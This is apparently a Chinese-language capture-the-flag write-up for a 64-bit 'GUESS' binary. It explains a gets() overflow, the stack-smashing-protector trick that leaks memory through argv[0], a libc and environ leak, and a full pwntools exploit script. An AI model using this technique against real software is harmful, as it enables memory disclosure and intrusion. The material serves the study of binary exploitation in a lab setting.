首先 查看保护
开启了 canary,NX 64位程序
ida查看程序
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
__WAIT_STATUS stat_loc; // [rsp+14h] [rbp-8Ch]
int v5; // [rsp+1Ch] [rbp-84h]
__int64 v6; // [rsp+20h] [rbp-80h]
__int64 v7; // [rsp+28h] [rbp-78h]
char buf; // [rsp+30h] [rbp-70h]
char s2; // [rsp+60h] [rbp-40h]
unsigned __int64 v10; // [rsp+98h] [rbp-8h]
v10 = __readfsqword(0x28u);
v7 = 3LL;
LODWORD(stat_loc.__uptr) = 0;
v6 = 0LL;
sub_4009A6(a1, a2, a3);
HIDWORD(stat_loc.__iptr) = open("./flag.txt", 0, a2);
if ( HIDWORD(stat_loc.__iptr) == -1 )
{
perror("./flag.txt");
_exit(-1);
}
read(SHIDWORD(stat_loc.__iptr), &buf, 0x30uLL);
close(SHIDWORD(stat_loc.__iptr));
puts("This is GUESS FLAG CHALLENGE!");
while ( 1 )
{
if ( v6 >= v7 )
{
puts("you have no sense... bye :-) ");
return 0LL;
}
v5 = sub_400A11();
if ( !v5 )
break;
++v6;
wait((__WAIT_STATUS)&stat_loc);
}
puts("Please type your guessing flag");
gets(&s2);
if ( !strcmp(&buf, &s2) )
puts("You must have great six sense!!!! :-o ");
else
puts("You should take more effort to get six sence, and one more challenge!!");
return 0LL;
}
首先是将flag.txt读入到buf中
这里有一个get 可以进行溢出
我们知道开启canary后 如果溢出将canary覆盖掉的话就会进入__stack_chk_fai 这个函数
看一下这个函数的源码
void__attribute__ ((noreturn)) __stack_chk_fail (void)
{
__fortify_fail ("stack smashing detected");
}
void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)
{
/* The loop is added only to keep gcc happy. */
while (1)
__libc_message (2, "*** %s ***: %s terminated\n", msg, __libc_argv[0] ?: "
"); }
看到函数中会将 __libc_argv[0]输出 如果__libc_argv[0]指向的是存储flag.txt那个buf的位置呢? 就会把buf输出出来
这就是 stack smashing的原理 通过覆盖__libc_argv[0]的内容通过canary保护报错信息将我们覆盖的内容输出出来
这里就是触发了canary保护 输出了
*** stack smashing detected ***: ./GUESS terminated
首先思考第一个问题
如何覆盖argv[0]这个变量?
可以通过gdb调试先找到我们输入地方的地址 然后再找到argv的地址 这样就可以计算两者之间的偏移
先找argv的地址,在上边那个图中可以看到 argv[0] 输出的是 “./GUESS”
这是指的程序文件,我们可以用gdb进行调试 断点下在main函数入口 指向文件位置那个就是argv[0]的地址
也可以直接通过 p 命令
然后就是 我们输入的地址 也就是s2的地址
可以将断点下在call get这个位置
可以看到s2是在rbp-0x40的位置
那么偏移就有了
下一个问题
我们如何让argv[0]指向存储flag的buf位置呢?
首先说一个environ
environ是libc中存储栈地址的一个变量 我们可以泄露libc地址然后算出environ的地址 然后算出flag和environ的偏移 就可以将flag通过触发cancry报错出来
存flag的地址和上边s2一样方法算出来
environ可以通过给在environ这下一个断点
就得到environ的地址了 那么 flag和environ的偏移就可以算了
from pwn import *
from LibcSearcher import *
sh = process('./GUESS')
#sh = remote('node3.buuoj.cn',29890)
elf = ELF('./GUESS')
puts_got = elf.got['puts']
print 'puts_got='+p64(puts_got)
def stackoverflow(payload):
sh.sendlineafter('Please type your guessing flag',payload)
stackoverflow('a'*0x128 + p64(puts_got))
sh.recvuntil('stack smashing detected ***: ')
puts_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'puts_addr='+hex(puts_addr)
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
environ_addr = libc_base + libc.dump('__environ')
print 'environ_addr='+hex(environ_addr)
stackoverflow('a'*0x128 + p64(environ_addr))
sh.recvuntil('stack smashing detected ***: ')
stack_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'stack_addr'+hex(stack_addr)
flag_addr = stack_addr - 0x168
print 'flag_addr=',hex(flag_addr)
stackoverflow('a'*0x128 + p64(flag_addr))
sh.interactive()